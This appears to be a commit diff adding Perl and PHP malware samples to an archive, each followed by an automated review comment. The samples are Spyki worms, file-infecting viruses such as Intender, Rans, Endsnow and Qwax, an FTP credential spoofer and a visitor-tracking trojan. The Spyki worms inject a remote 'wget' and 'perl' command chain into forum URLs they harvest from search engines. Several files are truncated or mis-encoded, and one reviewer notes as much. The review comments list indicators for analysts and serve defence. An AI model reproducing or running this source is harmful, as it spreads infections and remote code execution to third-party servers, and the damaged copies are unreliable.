local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub Pay Load() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/ ');
for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}
//milw0rm.com
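Review bot: The archived listing does not parse as Perl: the final routine is cut off mid-statement at `push(@d`, and several other lines in the hunk are visibly split or have stray characters, so this is an incomplete transcription rather than a runnable sample. A header comment stating that the file is a truncated/corrupted copy of the original source would save analysts time spent trying to read it as working code.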

109
Perl/Net-Worm.Perl.Spyki.a Normal file

@ -0,0 +1,109 @@
#/usr/bin/perl
#####################
####
#### #### #### #### #### #### #### # # # # ####
#### # # # # # # # # # # # # # #
#### #### # # ### ## #### # #### ## ###
#### # # # # # # # # # # # # #
#### # #### #### # # #### #### # # # # ####
####
use IO::Socket;
use LWP::Simple;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
while(1){
@vul = "";
$a=0;
$numero = int rand(999);
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
######################################
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{if ($uber !~ /cache/)
{if ($uber !~ /"/)
{if ($uber !~ /google/)
{if ($uber !~ /216/)
{if ($uber =~/http/)
{if ($uber !~ /start=/)
{
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++;
}}}}}}}}}
##########################
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++
}}
#########################
$wb = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252ec
hr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';
$b = scalar(@vul);
for($a=0;$a<=$b;$a++)
{
$sitevul = $vul[$a] . $wb;
if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
$teste1 = get($sitevul) or next;
$teste1 = "";
}
}
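Review bot: The `$wb` literal assigned just before the final loop is an opaque `chr()`-encoded string with no comment, which hides from a reader what the loop appends to every harvested URL; decoding the leading bytes gives `cd /tmp;wget www.visualcoders.net/…`, the same command chain that appears in plaintext as `$lista1` in the sibling Spyki.b listing. A one-line comment naming the decoded form and the contacted host would make the indicator obvious to analysts. The literal is also rendered split across two lines (`%252ec` / `hr(32)`), so the archived copy should be checked against the original before anyone relies on its exact bytes.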

212
Perl/Net-Worm.Perl.Spyki.b Normal file

@ -0,0 +1,212 @@
use LWP::Simple;
use IO::Socket::INET;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
while(1){
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);
open(sites,">$arq");
print sites "";
close(sites);
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{
if ($uber !~ /start=/)
{
open(arq,">>$arq");
print arq "$uber\n";
close(arq);
}}}}}}}}}
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
open(a,">>$arq");
print a "$uber\n";
close(a);
}}
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
chomp $sites[$a];
$a++;
$b++;}
close(ae);
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
print file "";
close(file);
open (file, ">$caxe1");
print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
while($data=~ m/<a href=".*?">.*?<\/a>/){
$data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
$ubersite=$1;
if ($ubersite =~/"/)
{
$nu = index $ubersite, '"';
$ubersite = substr($ubersite,0,$nu);
}
if ($ubersite !~/http/)
{$ubersite = $sites[$a].'/'.$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}
$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
{
if ($ja[$t] =~/=/)
{
$num = rindex $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
$num = index $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
$num1 = rindex $ja[$t], '.';
$subproc = substr($ja[$t],$num1,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
}
$t++;
}
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$q=0;
$w=0;
@hot;
open (ops,"<$caxe1");
while(<ops>)
{
$hot[$q] = $_;
chomp $hot[$q];
$q++;
$w++;
}
close(ops);
for($q=0;$q<=$w;$q++)
{
if ($hot[$q] =~/http/)
{
$tipo=get($hot[$q]) or next;
}}
}
}
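Review bot: The on-host tells of this sample are the process-title masquerade `$0="$processo"."\0"x16` with `$processo = "/usr/local/sbin/httpd - spy"` and the block that sets `INT`, `HUP`, `TERM`, `CHLD` and `PS` to `IGNORE`; the fake name is what `ps` shows, while `/proc/<pid>/exe` still resolves to the perl interpreter, which is the check a responder should rely on. The hard-coded second-stage URL assigned to `$lista1`, with its `cmd=cd /tmp;wget ...` injection string and the host it fetches from, is the network indicator to record in the entry's metadata. The section shows 184 code lines against the 212 the header reports and one line holds nine closing braces (`}}}}}}}}}`), so this render has dropped lines and should not be treated as a byte-accurate copy.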

73
Perl/Spoofer.Perl.Nicl Normal file

@ -0,0 +1,73 @@
# This is a simple tcp server that listens on port 21
# unless another is specified.
# The possible uses of this are;
# Ftp has no encryption for passwords and they are
# sent in plain text under the right conditions.
# Most ftp programs have a text file called <program-name>.ini
# which will store the info like site-name, user-name, encrypted
# password and account-name. Instead of trying to decrypt the
# password for each different application (ws_ftp etc)
# do this.
# Edit the <program-name>.ini
# Wherever there is a site-name change it to 127.0.0.1
# Start your this perl scipt
# Open your ftp program and click connect
# Most of this coding was already in the /perl/eg/ folder
# you can find the orginal version there ..
print "===========================\n";
print " Manicx local FTP spoofer\n";
print " www.infowar.co.uk/manicx/\n";
print "===========================\n";
($port) = @ARGV;
$port = 21 unless $port; # Are port is 21 unless specified
$AF_INET = 2;
$SOCK_STREAM = 1;
$sockaddr = 'S n a4 x8';
($name, $aliases, $proto) = getprotobyname('tcp');
if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}
print "Port = $port\n";
$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");
select(NS); $| = 1; select(stdout);
socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
bind(S,$this) || die "bind: $!";
listen(S,5) || die "connect: $!";
select(S); $| = 1; select(stdout);
print "Listening for connection..\n";
($addr = accept(NS,S)) || die $!;
print "Accept ok\n";
($af,$port,$inetaddr) = unpack($sockaddr,$addr);
@inetaddr = unpack('C4',$inetaddr);
print NS "220\n"; # We are ok for login (send username)
$user = <NS>;
print $user;
print NS "331\n"; # user ok send password
$pass = <NS>;
print $pass;
print NS "331\n"; # password ok send account
$acco = <NS>;
print $acco;
print NS "200\n"; # account ok send what you want.
$resp = <NS>;
print $resp;
print NS "451\n"; # bye bye baby
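Review bot: The script answers every client with fixed `220`/`331`/`331`/`200`/`451` replies and prints the USER, PASS and ACCT lines it receives to stdout, so the whole demonstration rests on the FTP client sending credentials in cleartext; the mitigation it illustrates is SFTP or FTPS on the wire and not relying on client `.ini` files that store passwords, as the header comment describes. Because the replies are not driven by what the client sends, the output is whatever arrives in that order, not a parsed login. The socket setup hand-builds `sockaddr` (`$AF_INET = 2`, `$sockaddr = 'S n a4 x8'`) in the style of the old `/perl/eg/` examples the header credits, rather than `Socket`'s `sockaddr_in`, which is not portable across platforms.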

60
Perl/Trojan.Perl.InfoSpy Normal file

@ -0,0 +1,60 @@
#/usr/bin/perl
################################################
# #
#**********************************************#
#* _ _ *#
#* |\_\\-\ /-//_/| *#
#* | \\-| |-// | *#
#* \ /~\\_____//~\ / *#
#* ` / \ ´ *#
#* | () () | Comando Trojan *#
#* \ ^ / -=- *#
#* ||||| www.comandotrojan.cjb.net *#
#* ||||| *#
#* *#
#**********************************************#
# #
# Vai Abaixo o CGI InfoSpy by iradium #
# #
# Por Favor Preserve estas Linhas #
# #
# chmod 755 #
# #
################################################
print "Content-type: text/html\n\n";
$c = "contador.txt";
#Nome do .txt log
$mailprog = "/usr/sbin/sendmail -t";
#Preste Atenção o real caminho do email no seu server
$emailadm = "seu_email\@seu_site.com.br;
#Deixe o \ no email
$vitima = "lamer_entrou@se_fudeu.com";
#Deixe como estar
#Lembrar de fazer um domínio tipo www.entrem.cjb.net e por index.cgi
print <<EOF;
+++ Coloque aqui o html fictício para ser exibido +++
EOF
open (N, "$c");
$n = <N>;
close (N);
$n++;
open (NE, ">$c");
print NE "$n";
close (NE);
open (MAIL, "|$mailprog") || print "Can't open $mailprog
.\n";
print MAIL "To: $vitima \n";
print MAIL "From: $emailadm\n";
print MAIL "Subject: Visita\n\n";
print MAIL "$ENV{'REMOTE_ADDR'} \n $ENV{'HTTP_USER_AGENT'} \n $ENV{'REMOTE_HOST'} \n $ENV{'REMOTE_USER'} $n\n\n ";
close MAIL;
#FIM DO ARQUIVO
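Review bot: The committed copy does not parse cleanly: `$emailadm = "seu_email\@seu_site.com.br;` has no closing quote, the message in `open (MAIL, "|$mailprog") || print "Can't open $mailprog` is split across a line break, and the first line reads `#/usr/bin/perl` without the `!`, so the archive entry should be flagged as a damaged or non-functional sample rather than a working one. Its intent is still legible: bump a hit counter kept in `contador.txt` and mail the visitor's `REMOTE_ADDR`, `HTTP_USER_AGENT`, `REMOTE_HOST` and `REMOTE_USER` to a fixed address behind a decoy HTML page, which is a visitor-tracking pattern, not code execution on the server. Neither the counter file nor the sendmail pipe is opened with a checked result.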

13
Perl/Virus.Perl.DirWorm Normal file

@ -0,0 +1,13 @@
# DirWorm by -Byst- (c) 1999
while (<*>) # ˆé¥¬ ¢á¥ ä ©«ë ¢ ⥪ã饩 ¤¨à¥ªâ®à¨¨
{
if (chdir($_)) { # …᫨ íâ® ¤¨à¥ªâ®à¨ï - ᬥ­¨âì ⥪ãéãî ­ ­¥¥
@command = ("cp ../worm.pl ./worm.pl > /dev/null");
system @command; # ‚맮¢ á¨á⥬­®© ä㭪樨 ª®¯¨à®¢ ­¨ï ä ©«
chdir(".."); # ‚®§à é ¥¬áï ®¡à â­® ¢ ­ ç «ì­ãî ¤¨à¥ªâ®à¨î
}
}
@command = ("cp ./worm.pl ../worm.pl");
system @command; # Š®¯¨à㥬 ⥫® ¢ த¨â¥«ìáªãî ¤¨à¥ªâ®à¨î
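Review bot: The trailing comments on `while (<*>)`, `if (chdir($_))`, both `system @command;` lines and `chdir("..")` are mojibake; the byte patterns are consistent with CP866-encoded Russian rendered as Latin-1, so the entry should record the original code page instead of storing the text as shown. Propagation is only `cp ../worm.pl ./worm.pl` into each subdirectory of the current directory and `cp ./worm.pl ../worm.pl` one level up, so the on-disk indicator is a `worm.pl` appearing in directories where no such file belongs. `system @command` is passed a single-element list, so the copy still runs through a shell.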

31
Perl/Virus.Perl.Endsnow.a Normal file

@ -0,0 +1,31 @@
opendir(DIR, "."); #open the directory this program is in
@FILES = readdir(DIR); #get the file names
closedir(DIR);
## Look for programs to spread to (limited to the current directory for now)
for ($i = 0; $i < @FILES; $i++) {
if (substr($FILES[$i], length($FILES[$i]) - 4) eq ".cgi" || substr($FILES[$i], length($FILES[$i]) - 3) eq ".pl") {
$TARGETS[$ii] = $FILES[$i];
$ii++;
}
}
for ($i = 0; $i < @TARGETS; $i++) {
open(FILE,$TARGETS[$i]);
$file = join("",<FILE>);
close(FILE);
if (index($file, "## Perl Virus Begins Now ##") == -1) { ##the file isn't infected, INFECT IT!! (append to it)
if ($me eq "") { #what we want to write hasn't been copied yet, this is a considerate virus, it could just keep copying itself each time and slow your computer down (and become a couple hundred bytes smaller)...
open(me,$0); #opens THIS program
$me = join("",<me>);
$start = index($me,"## Perl Virus Begins Now ##");
$me = substr($me, $start, rindex($me,"## Perl Virus Ends Now##") + 24 - $start);
close(me);
}
open(FILE,">>$TARGETS[$i]");
print FILE $me;
close(FILE);
}
}
closedir(DIR);
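Review bot: The literals `## Perl Virus Begins Now ##` and `## Perl Virus Ends Now##` (no space before the closing hashes in the second) are the sample's only already-infected test and are also the simplest signature for locating appended copies in the `.cgi` and `.pl` files of a directory. `$ii` is never initialised before `$TARGETS[$ii] = $FILES[$i]`, and `closedir(DIR)` is called a second time on the last line after the handle was closed near the top; neither stops execution without `use strict`, but both belong in the sample description since they show the code was not run with warnings.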

66
Perl/Virus.Perl.Intender Normal file

@ -0,0 +1,66 @@
#here virus starts
# Intender by -Byst- (c) 1999
$source = __FILE__;
while (<*.pl>)
{
$name = $_; # ˆ¬ï ä ©« -¦¥àâ¢ë
$cname = crypt($name,$name); # ˆ¬ï ¯à®¬¥¦ãâ®ç­®£® ä ©«
# <20>஢¥à¨¬ ­¥ ¨­ä¨æ¨à®¢ ­ «¨ 㦥 ä ©«?
open(TARGET,"<$name"); # ¦¥àâ¢
$allready_infected = 0;
while (<TARGET>) {
if (index($_,"\x23 Intender by -Byst- (c) 1999") == 0)
{ $allready_infected = 1;} # 㦥 ¨­ä¨æ¨à®¢ ­!
}
close(TARGET);
if ($allready_infected == 1 )
{ next;} # ¯¥à¥å®¤¨¬ ª á«¥¤ãî饩 ¦¥à⢥
# <20>஢¥à¨¬, ­¥â «¨ ¢ ⥫¥ ¦¥àâ¢ë áâப ⨯ !/usr/bin/perl
open(TARGET,"<$name"); # ¦¥àâ¢
$flag = 0;
while (<TARGET>) {
if (index($_,"\x23!") == 0) # <20> 諨 â ªãî áâபã
{ $flag = 1;} # ¢§¢®¤¨¬ ä« £
}
close(TARGET);
# ‘®§¤ ¥¬ ç áâì ¢ ª®â®à®© ᮤ¥à¦¨âáï ¢ë§®¢ ¯à®æ¥¤ãàë ¨­ä¨æ¨à®¢ ­¨ï
open(TARGET,"<$name"); # ¦¥àâ¢
open(FBUF,">$cname"); # ¯à®¬¥¦ãâ®ç­ë© ä ©«
if ($flag == 1) { # ã ¦¥àâ¢ë ¥áâì ®¡®§­ 祭¨¥ ­ ç « ¯à®£à ¬¬ë?
while (<TARGET>) { # ¨é¥¬ ¥£®
print(FBUF); # á®åà ­ï¥¬ ¢á¥ áâப¨ ¦¥àâ¢ë ¤® #!
if (index($_,"\x23!") == 0 ) # £ , ¢®â ¨ ­ ç «® ¯à®£à ¬¬ë
{ last;}
}
}
# ¨é¥¬ ⥫ ¯à®æ¥¤ãà
$_ = "\n";print(FBUF);
open(SOURCE,"<$source"); # â ªãî騩 ä ©«
while(<SOURCE>) { # ¨é¥¬ ¯à¨§­ ª ­ ç « - "#here virus starts"
if (index($_,"\x23here virus starts") == 0) { last;}
}
print(FBUF);
# ¢¥áì ⥪áâ ¯à®æ¥¤ãà -> ¯à®¬¥¦ãâ®ç­ë© ä ©«
while (<SOURCE>) {
print(FBUF);
if (index($_,"\x23here virus ends") == 0) { last;}
}
close(SOURCE);
$_ = "\n";print(FBUF);
# ®áâ ¢èãîáï ç áâì ¦¥àâ¢ë -> ¯à®¬¥¦ãâ®ç­ë© ä ©«
while (<TARGET>) {
print(FBUF);
}
close(TARGET);
close(FBUF);
rename($cname,$name);
}
#here virus ends
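Review bot: As with the DirWorm entry in this commit, the comments here are CP866 Russian shown as mojibake, and several already carry `<20>` replacement sequences (the lines beginning `# <20>஢¥à¨¬`), so bytes have been lost in this copy and the encoding should be recorded in the metadata rather than the text taken as authoritative. The already-infected test is an exact first-column match on `# Intender by -Byst- (c) 1999`, and the region between `#here virus starts` and `#here virus ends` is what gets spliced in after the target's `#!` line, which gives a responder two stable strings to search for. The rewrite goes through a temp file named `crypt($name,$name)` in the current directory followed by `rename($cname,$name)`, so file-integrity monitoring on `.pl` files sees a replace, not an in-place edit.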

43
Perl/Virus.Perl.Nars Normal file

@ -0,0 +1,43 @@
Perl.Sran
qwerty();#
sub qwerty {
a: while (<*.pl>)
{
my $oF = "qwerty";
my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);
open (WE, "<$0");
open (IFILE, "<$_");
open (TEMP, ">$tN");
while (<IFILE>)
{
chomp;
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TEMP "$_\n" }
else { print TEMP "$_ #!Sran\n$nF();\n" }
}
while (<WE>)
{
$st = "";
s/#[0-9].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
else {$st = ""}
chomp;
print TEMP "$_$st\n";
}
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
}
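Review bot: The first line `Perl.Sran` is an AV family label, not part of the code — a bareword expression in that position, not something the original sample would have carried — and the rest of the file is byte-identical to the `Perl/Virus.Perl.Rans.a` section later in this commit, so the two entries should be cross-referenced as one sample under two names. The trace the sample leaves is `#!Sran` appended to the target's shebang line followed by a `<name>();` call where `<name>` is `crypt($_, "qwerty")`, plus `chmod (0777, $oN)` on the rewritten file, so a world-writable `.pl` whose first line ends in `#!Sran` is the detection condition. Temp copies are staged under `$ENV{"HOME"}/tmp/` before `rename ($tN, $oN)`.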

30
Perl/Virus.Perl.Nirvana Normal file

@ -0,0 +1,30 @@
# Nirvana RuLeZ the world
# PERL.Nirvana
# by Second Part To Hell
# Thanks to SnakeByte for your tutorial!
open(file,$0);
@nirvana=<file>;
@nirvana=@nirvana[0...31]
close(file);
foreach $FileName (<*>)
{
if ((-r $FileName) && (-w $FileName) && (-f $FileName))
{
open (File, "$FileName");
@Lithium=<File>;
close(File);
if ((@Lithium[1] =~ "Nirvana") or (@Lithium[2] =~ "Nirvana"))
{
if((@Lithium[0] =~ "perl",,i) or (@Lithium[1] =~ "perl",,i))
{
open(sliver, ">$FileName");
print sliver @Nirvana;
print sliver @Litium;
close (sliver);
}
}
}
}
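Review bot: The file does not compile as stored and, read as written, is destructive rather than infectious: `@nirvana=@nirvana[0...31]` lacks its semicolon, `print sliver @Nirvana;` and `print sliver @Litium;` name arrays that differ in case and spelling from the ones actually filled (`@nirvana`, `@Lithium`), and `=~ "perl",,i` is not a valid match modifier. Without `use strict` the misspelled arrays are empty, so a target opened with `open(sliver, ">$FileName")` is truncated to zero bytes; the outer check is also inverted, proceeding only when line 2 or 3 already contains `Nirvana`, i.e. on copies of itself. That truncation behaviour, not propagation, is what an analysis note for this entry should record.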

90
Perl/Virus.Perl.Qwax Normal file

@ -0,0 +1,90 @@
<?//QAZWSX
function Infect($path)
{
global $self;
$handle = opendir($path);
$file = readdir($handle);
while ( false != $file )
{
if ($file != "." && $file != "..")
{
if (is_dir($path.$file))
{
Infect($path.$file."/");
}
else if (strrpos($file, ".php") != 0)
{
$do_infect = true;
$victim = fopen($path.$file, "r+");
while (!feof($victim))
{
$buf = fgets($victim, 4096);
if (strrpos($buf, "QAZWSX") != 0)
{
$do_infect = false;
break;
}
}
if ($do_infect)
{
fputs($victim, $self);
}
fclose($victim);
}
}
$file = readdir($handle);
}
closedir($handle);
}
$found = false;
$bracket_found = false;
$sf = fopen($SCRIPT_FILENAME, "r");
while (!feof($sf))
{
$s = fgets($sf, 4096);
if ($found)
{
$self .= $s;
if (strrpos($s, "?>") != 0)
{
if ($bracket_found)
{
break;
}
else
{
$bracket_found = true;
}
}
}
else if (strrpos($s, "QAZWSX") != 0)
{
$found = true;
$self = $s;
}
}
fclose($sf);
Infect($DOCUMENT_ROOT."/");
?>
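Review bot: This file is PHP, not Perl — `<?` open tag, `opendir`/`readdir`, `fopen`/`fgets`/`fputs`, `strrpos`, `global $self` — yet it is committed under `Perl/Virus.Perl.Qwax`, so the entry should be reclassified or the mismatch recorded in its metadata. It also relies on `$SCRIPT_FILENAME` and `$DOCUMENT_ROOT` being available as bare globals, which is `register_globals` behaviour removed in PHP 5.4, so the code does not run on a modern interpreter as written. The infection marker is the literal `QAZWSX` on the first line, tested with `strrpos($buf, "QAZWSX") != 0`, and is the string to search a document root for.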

41
Perl/Virus.Perl.Rans.a Normal file

@ -0,0 +1,41 @@
qwerty();#
sub qwerty {
a: while (<*.pl>)
{
my $oF = "qwerty";
my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);
open (WE, "<$0");
open (IFILE, "<$_");
open (TEMP, ">$tN");
while (<IFILE>)
{
chomp;
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TEMP "$_\n" }
else { print TEMP "$_ #!Sran\n$nF();\n" }
}
while (<WE>)
{
$st = "";
s/#[0-9].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
else {$st = ""}
chomp;
print TEMP "$_$st\n";
}
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
}

47
Perl/Virus.Perl.Rans.b Normal file

@ -0,0 +1,47 @@
sadBVa();
print "This is also a test.\n";
sub sadBVa { #21wZPocL9r3I2
#25lj6HLJr3lR.
goto b if($ENV{"USER"} eq "root"); #403dRcOOEKV7c
#53a2B3OFfBrvE
a: while (<*.pl>)
{ #11zR6D0l39gH2
my $oF = "sadBVa"; #21wZPocL9r3I2
my $tN = crypt($_, $_), $cW = 0; $oN = "./$_", $nF = $tN; #23xTGZMRTRgO.
#73QebE0Q0ZZ7Q
open (WE, "<$0");
open (IF, "<$_"); #19ffqqT32W0N6
open (TMP, ">$tN"); #21wZPocL9r3I2
#46uAWbWZGiwdE
$nF =~ s/[0-9.\/].*/a/;
#20DFf8jQEuujI
while (<IF>)
{
chomp; #17rFB3rla0OL.
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TMP "$_\n" }
else { if(!/-X/){$_ .= " -X"} print TMP "$_\n#!Sran\n$nF();\n" }
} #14HPto765IJGs
#56usvbQbO.V7g
while (<WE>)
{
$st = ""; #16DEAzgu4U/Lg
#21wZPocL9r3I2
s/#[\d].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\// || /$oF();/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($tN, rand(256)) }
else {$st = ""} #24kfAR.q3vZXI
chomp; #19ffqqT32W0N6
print TMP "$_$st\n"; #130lOPyQngaJw
}
#21wZPocL9r3I2
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
b: #24kfAR.q3vZXI
} #25lj6HLJr3lR.
